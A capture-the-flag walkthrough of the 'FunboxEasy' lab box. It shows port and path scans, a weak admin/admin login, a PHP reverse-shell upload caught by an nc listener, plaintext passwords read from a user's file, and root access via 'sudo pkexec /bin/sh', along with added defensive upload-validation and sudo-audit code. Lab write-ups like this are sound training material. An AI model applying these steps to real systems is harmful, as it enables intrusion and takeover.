Key takeaways
- Weak passwords
- Path enumeration
- File upload
Detailed steps
First, an nmap scan. Only ports 22, 80 and 3306 are open, but things are not that simple.
Nmap scan report for 192.168.125.111
Host is up (0.45s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 b2:d8:51:6e:c5:84:05:19:08:eb:c8:58:27:13:13:2f (RSA)
| 256 b0:de:97:03:a7:2f:f4:e2:ab:4a:9c:d9:43:9b:8a:48 (ECDSA)
|_ 256 9d:0f:9a:26:38:4f:01:80:a7:a6:80:9d:d1:d4:cf:ec (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
| http-methods:
|_ Supported Methods: GET POST OPTIONS HEAD
| http-robots.txt: 1 disallowed entry
|_gym
33060/tcp open mysqlx?
| fingerprint-strings:
| DNSStatusRequestTCP, LDAPSearchReq, NotesRPC, SSLSessionReq, TLSSessionReq, X11Probe, afp:
| Invalid message"
|_ HY000
Enumerating paths on port 80 turns up admin, secret, store and robots.txt (which contains a gym path).
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.125.111
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/SecLists/Discovery/Web-Content/big.txt
[+] Negative Status codes: 502,404,429,503,400
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.htpasswd (Status: 403) [Size: 280]
/.htaccess (Status: 403) [Size: 280]
/admin (Status: 301) [Size: 318] [--> http://192.168.125.111/admin/]
/robots.txt (Status: 200) [Size: 14]
/secret (Status: 301) [Size: 319] [--> http://192.168.125.111/secret/]
/server-status (Status: 403) [Size: 280]
/store (Status: 301) [Size: 318] [--> http://192.168.125.111/store/]
Progress: 20476 / 20477 (100.00%)
===============================================================
Finished
===============================================================
I tried admin first. It has an SQL injection vulnerability, but after logging in as admin I did not find many useful clues, so I moved on to the store page and logged in successfully with the weak credentials admin/admin.
Here I picked a random book as the test subject and tried uploading a modified php reverse shell file; no error was raised. If you do get an SQL error, set Author, Title and Publisher all to Test to avoid problems with special-character filtering.
After clicking Change -> Confirm and returning to the book list and the book details page, the image no longer displays; clicking Open Image in New Tab at that point triggers the reverse shell.
C:\home\kali\Documents\OFFSEC\play\FunboxEasy> nc -nlvp 80
listening on [any] 80 ...
connect to [192.168.45.241] from (UNKNOWN) [192.168.125.111] 47924
Linux funbox3 5.4.0-42-generic #46-Ubuntu SMP Fri Jul 10 00:24:02 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
00:32:28 up 35 min, 0 users, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
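The root cause above is that the store accepts a PHP file where it expects a cover image. As an added example (not the store application's own code), here is a Python stand-in for the validation such an upload handler should perform: an extension allowlist, an image-signature check, a scan for PHP open tags, and a server-chosen filename. The sample inputs in the test are constructed.

```python
import re
import secrets

# Added example, not the store app's own code: server-side checks an image upload
# handler should apply before storing a "book cover".
ALLOWED_EXT = {"jpg", "jpeg", "png", "gif"}
SIGNATURES = {
    b"\xff\xd8\xff": "jpg",
    b"\x89PNG\r\n\x1a\n": "png",
    b"GIF87a": "gif",
    b"GIF89a": "gif",
}
# Any PHP open tag, including the short "<?=" echo form
PHP_OPEN_TAG = re.compile(rb"<\?(?:php\b|=)", re.IGNORECASE)


def validate_upload(filename, data):
    """Return (accepted, reason) for a candidate upload."""
    # 1. Extension allowlist, judged only by the LAST suffix, so "shell.jpg.php"
    #    is rejected here and "shell.php.jpg" still has to pass the content checks.
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    if ext not in ALLOWED_EXT:
        return False, "extension not allowed"
    # 2. Content check: the leading bytes must be a real image signature.
    kind = next((k for sig, k in SIGNATURES.items() if data.startswith(sig)), None)
    if kind is None:
        return False, "no image signature"
    if kind != ("jpg" if ext == "jpeg" else ext):
        return False, "signature does not match extension"
    # 3. Defence in depth: a valid header with PHP source appended is still rejected.
    if PHP_OPEN_TAG.search(data):
        return False, "php open tag in body"
    return True, "ok"


def stored_name(filename):
    """Random server-chosen name: the client's filename never reaches the filesystem."""
    ext = filename.rsplit(".", 1)[-1].lower()
    return f"{secrets.token_hex(16)}.{ext}"
```

These checks complement, not replace, disabling script execution in the upload directory; an image re-encoded with an image library would also strip any appended payload.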
Neither sudo -l nor find / -type f -perm -4000 2>/dev/null gave any leads, but I did find the first flag and some passwords.
www-data@funbox3:/$ ls -l /home
ls -l /home
total 4
drwxr-xr-x 2 tony tony 4096 Oct 30 2020 tony
www-data@funbox3:/$ cd /home/tony
ls cd /home/tony
www-data@funbox3:/home/tony$ -lart
ls -lart
total 24
-rw-r--r-- 1 tony tony 807 Feb 25 2020 .profile
-rw-r--r-- 1 tony tony 3771 Feb 25 2020 .bashrc
-rw-r--r-- 1 tony tony 220 Feb 25 2020 .bash_logout
drwxr-xr-x 3 root root 4096 Jul 30 2020 ..
-rw-rw-r-- 1 tony tony 70 Jul 31 2020 password.txt
drwxr-xr-x 2 tony tony 4096 Oct 30 2020 .
-rw------- 1 tony tony 0 Oct 30 2020 .bash_history
www-data@funbox3:/home/tony$ cat password.txt
cat password.txt
ssh: yxcvbnmYYY
gym/admin: asdfghjklXXX
/store: admin@admin.com admin
www-data@funbox3:/home/tony$ ls -l /var/www
ls -l /var/www
total 8
drwxr-xr-x 6 root root 4096 Jul 31 2020 html
-rw-r--r-- 1 www-data www-data 33 Nov 17 23:59 local.txt
www-data@funbox3:/home/tony$ cat /var/www/local.txt
cat /var/www/local.txt
229c09619f54bfc769d3d6ad1c8aadb3
www-data@funbox3:/home/tony$
Trying the password from the ssh line to log in as tony succeeds.
C:\home\kali\Documents\OFFSEC\play\FunboxEasy> ssh tony@192.168.125.111
The authenticity of host '192.168.125.111 (192.168.125.111)' can't be established.
ED25519 key fingerprint is SHA256:sMY2EwBNywi3V/cmpdMCtvcC6NM31k0H9CTRlsxALfY.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.125.111' (ED25519) to the list of known hosts.
tony@192.168.125.111's password:
Welcome to Ubuntu 20.04 LTS (GNU/Linux 5.4.0-42-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Mon Nov 18 00:34:33 UTC 2024
System load: 0.02 Processes: 157
Usage of /: 76.1% of 4.66GB Users logged in: 0
Memory usage: 67% IPv4 address for ens256: 192.168.125.111
Swap usage: 0%
......
......
tony@funbox3:~$
Checking tony's sudo -l shows a lot of entries, so I tried them one by one.
tony@funbox3:~$ sudo -l
Matching Defaults entries for tony on funbox3:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User tony may run the following commands on funbox3:
(root) NOPASSWD: /usr/bin/yelp
(root) NOPASSWD: /usr/bin/dmf
(root) NOPASSWD: /usr/bin/whois
(root) NOPASSWD: /usr/bin/rlogin
(root) NOPASSWD: /usr/bin/pkexec
(root) NOPASSWD: /usr/bin/mtr
(root) NOPASSWD: /usr/bin/finger
(root) NOPASSWD: /usr/bin/time
(root) NOPASSWD: /usr/bin/cancel
(root) NOPASSWD: /root/a/b/c/d/e/f/g/h/i/j/k/l/m/n/o/q/r/s/t/u/v/w/x/y/z/.smile.sh
In the end, pkexec turned out to be the key.
tony@funbox3:~$ sudo /usr/bin/pkexec /bin/sh
# id
uid=0(root) gid=0(root) groups=0(root)
# cat /root/proof.txt
dc029f6c7e590b0b07d804c2a655ef52
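The sudo rules above are what made the final step trivial. As an added example (not from the walkthrough or the box), here is a Python parser for `sudo -l` output in the format shown, with an audit that flags the rules a defender should review first: commands that hand out a root shell directly (pkexec, as used here), scripts outside the system binary directories, and any NOPASSWD root entry. SAMPLE is a constructed copy of part of the box's output.

```python
import re

# Added example, not from the page: parse `sudo -l` output and flag rules for review.
# SAMPLE is a constructed excerpt of the output shown in the walkthrough.
SAMPLE = r"""Matching Defaults entries for tony on funbox3:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User tony may run the following commands on funbox3:
    (root) NOPASSWD: /usr/bin/yelp
    (root) NOPASSWD: /usr/bin/pkexec
    (root) NOPASSWD: /usr/bin/time
    (root) NOPASSWD: /root/a/b/c/d/e/f/g/h/i/j/k/l/m/n/o/q/r/s/t/u/v/w/x/y/z/.smile.sh
"""

# "(runas) TAG: TAG: command"; tags such as NOPASSWD are optional
RULE = re.compile(r"^\s*\((?P<runas>[^)]+)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmd>.+?)\s*$")
# Commands that give the caller a root shell outright when run under sudo.
# pkexec is the one this walkthrough used; extend the set from your own review.
DIRECT_SHELL = {"/usr/bin/pkexec"}
SYSTEM_DIRS = ("/usr/bin/", "/usr/sbin/", "/bin/", "/sbin/", "/usr/local/bin/", "/usr/local/sbin/")


def parse_sudo_l(text):
    """Return a list of (runas, tags, command) tuples from `sudo -l` output."""
    rules = []
    for line in text.splitlines():
        m = RULE.match(line)
        if m:
            tags = {t.strip() for t in m.group("tags").split(":") if t.strip()}
            # "(ALL : ALL)" lists run-as user and group; keep the user part
            rules.append((m.group("runas").split(":")[0].strip(), tags, m.group("cmd")))
    return rules


def audit(rules):
    """Classify each root-capable rule; returns (command, finding) pairs."""
    findings = []
    for runas, tags, cmd in rules:
        if runas not in ("root", "ALL"):
            continue
        if cmd == "ALL":
            findings.append((cmd, "unrestricted root"))
        elif cmd in DIRECT_SHELL:
            findings.append((cmd, "yields a root shell directly"))
        elif not cmd.startswith(SYSTEM_DIRS):
            findings.append((cmd, "script outside system dirs: check owner and write permissions"))
        elif "NOPASSWD" in tags:
            findings.append((cmd, "root without password"))
    return findings
```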